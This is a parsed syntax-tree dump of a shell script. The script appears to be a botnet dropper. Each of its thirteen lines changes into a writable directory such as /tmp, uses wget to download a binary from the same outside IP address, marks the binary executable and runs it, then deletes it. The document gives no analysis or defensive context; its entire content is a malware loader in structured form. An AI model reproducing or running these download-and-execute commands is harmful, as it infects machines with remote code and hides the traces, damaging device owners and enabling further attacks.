ListNode(lineno=2, pos=(12, 142), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 100), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 100), word='http://185.244.25.144/earyzq'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(100, 101)),
  CommandNode(lineno=2, pos=(102, 117), parts=[
    WordNode(lineno=2, pos=(102, 107), word='chmod'),
    WordNode(lineno=2, pos=(108, 110), word='+x'),
    WordNode(lineno=2, pos=(111, 117), word='earyzq'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(117, 118)),
  CommandNode(lineno=2, pos=(119, 127), parts=[
    WordNode(lineno=2, pos=(119, 127), word='./earyzq'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(127, 128)),
  CommandNode(lineno=2, pos=(129, 142), parts=[
    WordNode(lineno=2, pos=(129, 131), word='rm'),
    WordNode(lineno=2, pos=(132, 135), word='-rf'),
    WordNode(lineno=2, pos=(136, 142), word='earyzq'),
  ]),
])
ListNode(lineno=3, pos=(143, 273), parts=[
  CommandNode(lineno=3, pos=(143, 150), parts=[
    WordNode(lineno=3, pos=(143, 145), word='cd'),
    WordNode(lineno=3, pos=(146, 150), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(151, 153)),
  CommandNode(lineno=3, pos=(154, 165), parts=[
    WordNode(lineno=3, pos=(154, 156), word='cd'),
    WordNode(lineno=3, pos=(157, 165), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(166, 168)),
  CommandNode(lineno=3, pos=(169, 176), parts=[
    WordNode(lineno=3, pos=(169, 171), word='cd'),
    WordNode(lineno=3, pos=(172, 176), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(177, 179)),
  CommandNode(lineno=3, pos=(180, 188), parts=[
    WordNode(lineno=3, pos=(180, 182), word='cd'),
    WordNode(lineno=3, pos=(183, 188), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(189, 191)),
  CommandNode(lineno=3, pos=(192, 196), parts=[
    WordNode(lineno=3, pos=(192, 194), word='cd'),
    WordNode(lineno=3, pos=(195, 196), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(196, 197)),
  CommandNode(lineno=3, pos=(198, 231), parts=[
    WordNode(lineno=3, pos=(198, 202), word='wget'),
    WordNode(lineno=3, pos=(203, 231), word='http://185.244.25.144/cemtop'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(231, 232)),
  CommandNode(lineno=3, pos=(233, 248), parts=[
    WordNode(lineno=3, pos=(233, 238), word='chmod'),
    WordNode(lineno=3, pos=(239, 241), word='+x'),
    WordNode(lineno=3, pos=(242, 248), word='cemtop'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(248, 249)),
  CommandNode(lineno=3, pos=(250, 258), parts=[
    WordNode(lineno=3, pos=(250, 258), word='./cemtop'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(258, 259)),
  CommandNode(lineno=3, pos=(260, 273), parts=[
    WordNode(lineno=3, pos=(260, 262), word='rm'),
    WordNode(lineno=3, pos=(263, 266), word='-rf'),
    WordNode(lineno=3, pos=(267, 273), word='cemtop'),
  ]),
])
ListNode(lineno=4, pos=(274, 404), parts=[
  CommandNode(lineno=4, pos=(274, 281), parts=[
    WordNode(lineno=4, pos=(274, 276), word='cd'),
    WordNode(lineno=4, pos=(277, 281), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(282, 284)),
  CommandNode(lineno=4, pos=(285, 296), parts=[
    WordNode(lineno=4, pos=(285, 287), word='cd'),
    WordNode(lineno=4, pos=(288, 296), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(297, 299)),
  CommandNode(lineno=4, pos=(300, 307), parts=[
    WordNode(lineno=4, pos=(300, 302), word='cd'),
    WordNode(lineno=4, pos=(303, 307), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(308, 310)),
  CommandNode(lineno=4, pos=(311, 319), parts=[
    WordNode(lineno=4, pos=(311, 313), word='cd'),
    WordNode(lineno=4, pos=(314, 319), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(320, 322)),
  CommandNode(lineno=4, pos=(323, 327), parts=[
    WordNode(lineno=4, pos=(323, 325), word='cd'),
    WordNode(lineno=4, pos=(326, 327), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(327, 328)),
  CommandNode(lineno=4, pos=(329, 362), parts=[
    WordNode(lineno=4, pos=(329, 333), word='wget'),
    WordNode(lineno=4, pos=(334, 362), word='http://185.244.25.144/vtyhat'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(362, 363)),
  CommandNode(lineno=4, pos=(364, 379), parts=[
    WordNode(lineno=4, pos=(364, 369), word='chmod'),
    WordNode(lineno=4, pos=(370, 372), word='+x'),
    WordNode(lineno=4, pos=(373, 379), word='vtyhat'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(379, 380)),
  CommandNode(lineno=4, pos=(381, 389), parts=[
    WordNode(lineno=4, pos=(381, 389), word='./vtyhat'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(389, 390)),
  CommandNode(lineno=4, pos=(391, 404), parts=[
    WordNode(lineno=4, pos=(391, 393), word='rm'),
    WordNode(lineno=4, pos=(394, 397), word='-rf'),
    WordNode(lineno=4, pos=(398, 404), word='vtyhat'),
  ]),
])
ListNode(lineno=5, pos=(405, 535), parts=[
  CommandNode(lineno=5, pos=(405, 412), parts=[
    WordNode(lineno=5, pos=(405, 407), word='cd'),
    WordNode(lineno=5, pos=(408, 412), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(413, 415)),
  CommandNode(lineno=5, pos=(416, 427), parts=[
    WordNode(lineno=5, pos=(416, 418), word='cd'),
    WordNode(lineno=5, pos=(419, 427), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(428, 430)),
  CommandNode(lineno=5, pos=(431, 438), parts=[
    WordNode(lineno=5, pos=(431, 433), word='cd'),
    WordNode(lineno=5, pos=(434, 438), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(439, 441)),
  CommandNode(lineno=5, pos=(442, 450), parts=[
    WordNode(lineno=5, pos=(442, 444), word='cd'),
    WordNode(lineno=5, pos=(445, 450), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(451, 453)),
  CommandNode(lineno=5, pos=(454, 458), parts=[
    WordNode(lineno=5, pos=(454, 456), word='cd'),
    WordNode(lineno=5, pos=(457, 458), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(458, 459)),
  CommandNode(lineno=5, pos=(460, 493), parts=[
    WordNode(lineno=5, pos=(460, 464), word='wget'),
    WordNode(lineno=5, pos=(465, 493), word='http://185.244.25.144/vvglma'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(493, 494)),
  CommandNode(lineno=5, pos=(495, 510), parts=[
    WordNode(lineno=5, pos=(495, 500), word='chmod'),
    WordNode(lineno=5, pos=(501, 503), word='+x'),
    WordNode(lineno=5, pos=(504, 510), word='vvglma'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(510, 511)),
  CommandNode(lineno=5, pos=(512, 520), parts=[
    WordNode(lineno=5, pos=(512, 520), word='./vvglma'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(520, 521)),
  CommandNode(lineno=5, pos=(522, 535), parts=[
    WordNode(lineno=5, pos=(522, 524), word='rm'),
    WordNode(lineno=5, pos=(525, 528), word='-rf'),
    WordNode(lineno=5, pos=(529, 535), word='vvglma'),
  ]),
])
ListNode(lineno=6, pos=(536, 666), parts=[
  CommandNode(lineno=6, pos=(536, 543), parts=[
    WordNode(lineno=6, pos=(536, 538), word='cd'),
    WordNode(lineno=6, pos=(539, 543), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(544, 546)),
  CommandNode(lineno=6, pos=(547, 558), parts=[
    WordNode(lineno=6, pos=(547, 549), word='cd'),
    WordNode(lineno=6, pos=(550, 558), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(559, 561)),
  CommandNode(lineno=6, pos=(562, 569), parts=[
    WordNode(lineno=6, pos=(562, 564), word='cd'),
    WordNode(lineno=6, pos=(565, 569), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(570, 572)),
  CommandNode(lineno=6, pos=(573, 581), parts=[
    WordNode(lineno=6, pos=(573, 575), word='cd'),
    WordNode(lineno=6, pos=(576, 581), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(582, 584)),
  CommandNode(lineno=6, pos=(585, 589), parts=[
    WordNode(lineno=6, pos=(585, 587), word='cd'),
    WordNode(lineno=6, pos=(588, 589), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(589, 590)),
  CommandNode(lineno=6, pos=(591, 624), parts=[
    WordNode(lineno=6, pos=(591, 595), word='wget'),
    WordNode(lineno=6, pos=(596, 624), word='http://185.244.25.144/nvitpj'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(624, 625)),
  CommandNode(lineno=6, pos=(626, 641), parts=[
    WordNode(lineno=6, pos=(626, 631), word='chmod'),
    WordNode(lineno=6, pos=(632, 634), word='+x'),
    WordNode(lineno=6, pos=(635, 641), word='nvitpj'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(641, 642)),
  CommandNode(lineno=6, pos=(643, 651), parts=[
    WordNode(lineno=6, pos=(643, 651), word='./nvitpj'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(651, 652)),
  CommandNode(lineno=6, pos=(653, 666), parts=[
    WordNode(lineno=6, pos=(653, 655), word='rm'),
    WordNode(lineno=6, pos=(656, 659), word='-rf'),
    WordNode(lineno=6, pos=(660, 666), word='nvitpj'),
  ]),
])
ListNode(lineno=7, pos=(667, 797), parts=[
  CommandNode(lineno=7, pos=(667, 674), parts=[
    WordNode(lineno=7, pos=(667, 669), word='cd'),
    WordNode(lineno=7, pos=(670, 674), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(675, 677)),
  CommandNode(lineno=7, pos=(678, 689), parts=[
    WordNode(lineno=7, pos=(678, 680), word='cd'),
    WordNode(lineno=7, pos=(681, 689), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(690, 692)),
  CommandNode(lineno=7, pos=(693, 700), parts=[
    WordNode(lineno=7, pos=(693, 695), word='cd'),
    WordNode(lineno=7, pos=(696, 700), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(701, 703)),
  CommandNode(lineno=7, pos=(704, 712), parts=[
    WordNode(lineno=7, pos=(704, 706), word='cd'),
    WordNode(lineno=7, pos=(707, 712), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(713, 715)),
  CommandNode(lineno=7, pos=(716, 720), parts=[
    WordNode(lineno=7, pos=(716, 718), word='cd'),
    WordNode(lineno=7, pos=(719, 720), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(720, 721)),
  CommandNode(lineno=7, pos=(722, 755), parts=[
    WordNode(lineno=7, pos=(722, 726), word='wget'),
    WordNode(lineno=7, pos=(727, 755), word='http://185.244.25.144/razdzn'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(755, 756)),
  CommandNode(lineno=7, pos=(757, 772), parts=[
    WordNode(lineno=7, pos=(757, 762), word='chmod'),
    WordNode(lineno=7, pos=(763, 765), word='+x'),
    WordNode(lineno=7, pos=(766, 772), word='razdzn'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(772, 773)),
  CommandNode(lineno=7, pos=(774, 782), parts=[
    WordNode(lineno=7, pos=(774, 782), word='./razdzn'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(782, 783)),
  CommandNode(lineno=7, pos=(784, 797), parts=[
    WordNode(lineno=7, pos=(784, 786), word='rm'),
    WordNode(lineno=7, pos=(787, 790), word='-rf'),
    WordNode(lineno=7, pos=(791, 797), word='razdzn'),
  ]),
])
ListNode(lineno=8, pos=(798, 928), parts=[
  CommandNode(lineno=8, pos=(798, 805), parts=[
    WordNode(lineno=8, pos=(798, 800), word='cd'),
    WordNode(lineno=8, pos=(801, 805), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(806, 808)),
  CommandNode(lineno=8, pos=(809, 820), parts=[
    WordNode(lineno=8, pos=(809, 811), word='cd'),
    WordNode(lineno=8, pos=(812, 820), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(821, 823)),
  CommandNode(lineno=8, pos=(824, 831), parts=[
    WordNode(lineno=8, pos=(824, 826), word='cd'),
    WordNode(lineno=8, pos=(827, 831), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(832, 834)),
  CommandNode(lineno=8, pos=(835, 843), parts=[
    WordNode(lineno=8, pos=(835, 837), word='cd'),
    WordNode(lineno=8, pos=(838, 843), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(844, 846)),
  CommandNode(lineno=8, pos=(847, 851), parts=[
    WordNode(lineno=8, pos=(847, 849), word='cd'),
    WordNode(lineno=8, pos=(850, 851), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(851, 852)),
  CommandNode(lineno=8, pos=(853, 886), parts=[
    WordNode(lineno=8, pos=(853, 857), word='wget'),
    WordNode(lineno=8, pos=(858, 886), word='http://185.244.25.144/lnkfmx'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(886, 887)),
  CommandNode(lineno=8, pos=(888, 903), parts=[
    WordNode(lineno=8, pos=(888, 893), word='chmod'),
    WordNode(lineno=8, pos=(894, 896), word='+x'),
    WordNode(lineno=8, pos=(897, 903), word='lnkfmx'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(903, 904)),
  CommandNode(lineno=8, pos=(905, 913), parts=[
    WordNode(lineno=8, pos=(905, 913), word='./lnkfmx'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(913, 914)),
  CommandNode(lineno=8, pos=(915, 928), parts=[
    WordNode(lineno=8, pos=(915, 917), word='rm'),
    WordNode(lineno=8, pos=(918, 921), word='-rf'),
    WordNode(lineno=8, pos=(922, 928), word='lnkfmx'),
  ]),
])
ListNode(lineno=9, pos=(929, 1059), parts=[
  CommandNode(lineno=9, pos=(929, 936), parts=[
    WordNode(lineno=9, pos=(929, 931), word='cd'),
    WordNode(lineno=9, pos=(932, 936), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(937, 939)),
  CommandNode(lineno=9, pos=(940, 951), parts=[
    WordNode(lineno=9, pos=(940, 942), word='cd'),
    WordNode(lineno=9, pos=(943, 951), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(952, 954)),
  CommandNode(lineno=9, pos=(955, 962), parts=[
    WordNode(lineno=9, pos=(955, 957), word='cd'),
    WordNode(lineno=9, pos=(958, 962), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(963, 965)),
  CommandNode(lineno=9, pos=(966, 974), parts=[
    WordNode(lineno=9, pos=(966, 968), word='cd'),
    WordNode(lineno=9, pos=(969, 974), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(975, 977)),
  CommandNode(lineno=9, pos=(978, 982), parts=[
    WordNode(lineno=9, pos=(978, 980), word='cd'),
    WordNode(lineno=9, pos=(981, 982), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(982, 983)),
  CommandNode(lineno=9, pos=(984, 1017), parts=[
    WordNode(lineno=9, pos=(984, 988), word='wget'),
    WordNode(lineno=9, pos=(989, 1017), word='http://185.244.25.144/qvmxvl'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1017, 1018)),
  CommandNode(lineno=9, pos=(1019, 1034), parts=[
    WordNode(lineno=9, pos=(1019, 1024), word='chmod'),
    WordNode(lineno=9, pos=(1025, 1027), word='+x'),
    WordNode(lineno=9, pos=(1028, 1034), word='qvmxvl'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1034, 1035)),
  CommandNode(lineno=9, pos=(1036, 1044), parts=[
    WordNode(lineno=9, pos=(1036, 1044), word='./qvmxvl'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1044, 1045)),
  CommandNode(lineno=9, pos=(1046, 1059), parts=[
    WordNode(lineno=9, pos=(1046, 1048), word='rm'),
    WordNode(lineno=9, pos=(1049, 1052), word='-rf'),
    WordNode(lineno=9, pos=(1053, 1059), word='qvmxvl'),
  ]),
])
ListNode(lineno=10, pos=(1060, 1190), parts=[
  CommandNode(lineno=10, pos=(1060, 1067), parts=[
    WordNode(lineno=10, pos=(1060, 1062), word='cd'),
    WordNode(lineno=10, pos=(1063, 1067), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1068, 1070)),
  CommandNode(lineno=10, pos=(1071, 1082), parts=[
    WordNode(lineno=10, pos=(1071, 1073), word='cd'),
    WordNode(lineno=10, pos=(1074, 1082), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1083, 1085)),
  CommandNode(lineno=10, pos=(1086, 1093), parts=[
    WordNode(lineno=10, pos=(1086, 1088), word='cd'),
    WordNode(lineno=10, pos=(1089, 1093), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1094, 1096)),
  CommandNode(lineno=10, pos=(1097, 1105), parts=[
    WordNode(lineno=10, pos=(1097, 1099), word='cd'),
    WordNode(lineno=10, pos=(1100, 1105), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1106, 1108)),
  CommandNode(lineno=10, pos=(1109, 1113), parts=[
    WordNode(lineno=10, pos=(1109, 1111), word='cd'),
    WordNode(lineno=10, pos=(1112, 1113), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1113, 1114)),
  CommandNode(lineno=10, pos=(1115, 1148), parts=[
    WordNode(lineno=10, pos=(1115, 1119), word='wget'),
    WordNode(lineno=10, pos=(1120, 1148), word='http://185.244.25.144/ajoomk'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1148, 1149)),
  CommandNode(lineno=10, pos=(1150, 1165), parts=[
    WordNode(lineno=10, pos=(1150, 1155), word='chmod'),
    WordNode(lineno=10, pos=(1156, 1158), word='+x'),
    WordNode(lineno=10, pos=(1159, 1165), word='ajoomk'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1165, 1166)),
  CommandNode(lineno=10, pos=(1167, 1175), parts=[
    WordNode(lineno=10, pos=(1167, 1175), word='./ajoomk'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1175, 1176)),
  CommandNode(lineno=10, pos=(1177, 1190), parts=[
    WordNode(lineno=10, pos=(1177, 1179), word='rm'),
    WordNode(lineno=10, pos=(1180, 1183), word='-rf'),
    WordNode(lineno=10, pos=(1184, 1190), word='ajoomk'),
  ]),
])
ListNode(lineno=11, pos=(1191, 1321), parts=[
  CommandNode(lineno=11, pos=(1191, 1198), parts=[
    WordNode(lineno=11, pos=(1191, 1193), word='cd'),
    WordNode(lineno=11, pos=(1194, 1198), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1199, 1201)),
  CommandNode(lineno=11, pos=(1202, 1213), parts=[
    WordNode(lineno=11, pos=(1202, 1204), word='cd'),
    WordNode(lineno=11, pos=(1205, 1213), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1214, 1216)),
  CommandNode(lineno=11, pos=(1217, 1224), parts=[
    WordNode(lineno=11, pos=(1217, 1219), word='cd'),
    WordNode(lineno=11, pos=(1220, 1224), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1225, 1227)),
  CommandNode(lineno=11, pos=(1228, 1236), parts=[
    WordNode(lineno=11, pos=(1228, 1230), word='cd'),
    WordNode(lineno=11, pos=(1231, 1236), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1237, 1239)),
  CommandNode(lineno=11, pos=(1240, 1244), parts=[
    WordNode(lineno=11, pos=(1240, 1242), word='cd'),
    WordNode(lineno=11, pos=(1243, 1244), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1244, 1245)),
  CommandNode(lineno=11, pos=(1246, 1279), parts=[
    WordNode(lineno=11, pos=(1246, 1250), word='wget'),
    WordNode(lineno=11, pos=(1251, 1279), word='http://185.244.25.144/fwdfvf'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1279, 1280)),
  CommandNode(lineno=11, pos=(1281, 1296), parts=[
    WordNode(lineno=11, pos=(1281, 1286), word='chmod'),
    WordNode(lineno=11, pos=(1287, 1289), word='+x'),
    WordNode(lineno=11, pos=(1290, 1296), word='fwdfvf'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1296, 1297)),
  CommandNode(lineno=11, pos=(1298, 1306), parts=[
    WordNode(lineno=11, pos=(1298, 1306), word='./fwdfvf'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1306, 1307)),
  CommandNode(lineno=11, pos=(1308, 1321), parts=[
    WordNode(lineno=11, pos=(1308, 1310), word='rm'),
    WordNode(lineno=11, pos=(1311, 1314), word='-rf'),
    WordNode(lineno=11, pos=(1315, 1321), word='fwdfvf'),
  ]),
])
ListNode(lineno=12, pos=(1322, 1452), parts=[
  CommandNode(lineno=12, pos=(1322, 1329), parts=[
    WordNode(lineno=12, pos=(1322, 1324), word='cd'),
    WordNode(lineno=12, pos=(1325, 1329), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1330, 1332)),
  CommandNode(lineno=12, pos=(1333, 1344), parts=[
    WordNode(lineno=12, pos=(1333, 1335), word='cd'),
    WordNode(lineno=12, pos=(1336, 1344), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1345, 1347)),
  CommandNode(lineno=12, pos=(1348, 1355), parts=[
    WordNode(lineno=12, pos=(1348, 1350), word='cd'),
    WordNode(lineno=12, pos=(1351, 1355), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1356, 1358)),
  CommandNode(lineno=12, pos=(1359, 1367), parts=[
    WordNode(lineno=12, pos=(1359, 1361), word='cd'),
    WordNode(lineno=12, pos=(1362, 1367), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1368, 1370)),
  CommandNode(lineno=12, pos=(1371, 1375), parts=[
    WordNode(lineno=12, pos=(1371, 1373), word='cd'),
    WordNode(lineno=12, pos=(1374, 1375), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1375, 1376)),
  CommandNode(lineno=12, pos=(1377, 1410), parts=[
    WordNode(lineno=12, pos=(1377, 1381), word='wget'),
    WordNode(lineno=12, pos=(1382, 1410), word='http://185.244.25.144/atxhua'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1410, 1411)),
  CommandNode(lineno=12, pos=(1412, 1427), parts=[
    WordNode(lineno=12, pos=(1412, 1417), word='chmod'),
    WordNode(lineno=12, pos=(1418, 1420), word='+x'),
    WordNode(lineno=12, pos=(1421, 1427), word='atxhua'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1427, 1428)),
  CommandNode(lineno=12, pos=(1429, 1437), parts=[
    WordNode(lineno=12, pos=(1429, 1437), word='./atxhua'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1437, 1438)),
  CommandNode(lineno=12, pos=(1439, 1452), parts=[
    WordNode(lineno=12, pos=(1439, 1441), word='rm'),
    WordNode(lineno=12, pos=(1442, 1445), word='-rf'),
    WordNode(lineno=12, pos=(1446, 1452), word='atxhua'),
  ]),
])
ListNode(lineno=13, pos=(1453, 1583), parts=[
  CommandNode(lineno=13, pos=(1453, 1460), parts=[
    WordNode(lineno=13, pos=(1453, 1455), word='cd'),
    WordNode(lineno=13, pos=(1456, 1460), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1461, 1463)),
  CommandNode(lineno=13, pos=(1464, 1475), parts=[
    WordNode(lineno=13, pos=(1464, 1466), word='cd'),
    WordNode(lineno=13, pos=(1467, 1475), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1476, 1478)),
  CommandNode(lineno=13, pos=(1479, 1486), parts=[
    WordNode(lineno=13, pos=(1479, 1481), word='cd'),
    WordNode(lineno=13, pos=(1482, 1486), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1487, 1489)),
  CommandNode(lineno=13, pos=(1490, 1498), parts=[
    WordNode(lineno=13, pos=(1490, 1492), word='cd'),
    WordNode(lineno=13, pos=(1493, 1498), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1499, 1501)),
  CommandNode(lineno=13, pos=(1502, 1506), parts=[
    WordNode(lineno=13, pos=(1502, 1504), word='cd'),
    WordNode(lineno=13, pos=(1505, 1506), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1506, 1507)),
  CommandNode(lineno=13, pos=(1508, 1541), parts=[
    WordNode(lineno=13, pos=(1508, 1512), word='wget'),
    WordNode(lineno=13, pos=(1513, 1541), word='http://185.244.25.144/qtmzbn'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1541, 1542)),
  CommandNode(lineno=13, pos=(1543, 1558), parts=[
    WordNode(lineno=13, pos=(1543, 1548), word='chmod'),
    WordNode(lineno=13, pos=(1549, 1551), word='+x'),
    WordNode(lineno=13, pos=(1552, 1558), word='qtmzbn'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1558, 1559)),
  CommandNode(lineno=13, pos=(1560, 1568), parts=[
    WordNode(lineno=13, pos=(1560, 1568), word='./qtmzbn'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1568, 1569)),
  CommandNode(lineno=13, pos=(1570, 1583), parts=[
    WordNode(lineno=13, pos=(1570, 1572), word='rm'),
    WordNode(lineno=13, pos=(1573, 1576), word='-rf'),
    WordNode(lineno=13, pos=(1577, 1583), word='qtmzbn'),
  ]),
])
ListNode(lineno=14, pos=(1584, 1714), parts=[
  CommandNode(lineno=14, pos=(1584, 1591), parts=[
    WordNode(lineno=14, pos=(1584, 1586), word='cd'),
    WordNode(lineno=14, pos=(1587, 1591), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1592, 1594)),
  CommandNode(lineno=14, pos=(1595, 1606), parts=[
    WordNode(lineno=14, pos=(1595, 1597), word='cd'),
    WordNode(lineno=14, pos=(1598, 1606), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1607, 1609)),
  CommandNode(lineno=14, pos=(1610, 1617), parts=[
    WordNode(lineno=14, pos=(1610, 1612), word='cd'),
    WordNode(lineno=14, pos=(1613, 1617), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1618, 1620)),
  CommandNode(lineno=14, pos=(1621, 1629), parts=[
    WordNode(lineno=14, pos=(1621, 1623), word='cd'),
    WordNode(lineno=14, pos=(1624, 1629), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1630, 1632)),
  CommandNode(lineno=14, pos=(1633, 1637), parts=[
    WordNode(lineno=14, pos=(1633, 1635), word='cd'),
    WordNode(lineno=14, pos=(1636, 1637), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1637, 1638)),
  CommandNode(lineno=14, pos=(1639, 1672), parts=[
    WordNode(lineno=14, pos=(1639, 1643), word='wget'),
    WordNode(lineno=14, pos=(1644, 1672), word='http://185.244.25.144/adcvds'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1672, 1673)),
  CommandNode(lineno=14, pos=(1674, 1689), parts=[
    WordNode(lineno=14, pos=(1674, 1679), word='chmod'),
    WordNode(lineno=14, pos=(1680, 1682), word='+x'),
    WordNode(lineno=14, pos=(1683, 1689), word='adcvds'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1689, 1690)),
  CommandNode(lineno=14, pos=(1691, 1699), parts=[
    WordNode(lineno=14, pos=(1691, 1699), word='./adcvds'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1699, 1700)),
  CommandNode(lineno=14, pos=(1701, 1714), parts=[
    WordNode(lineno=14, pos=(1701, 1703), word='rm'),
    WordNode(lineno=14, pos=(1704, 1707), word='-rf'),
    WordNode(lineno=14, pos=(1708, 1714), word='adcvds'),
  ]),
])
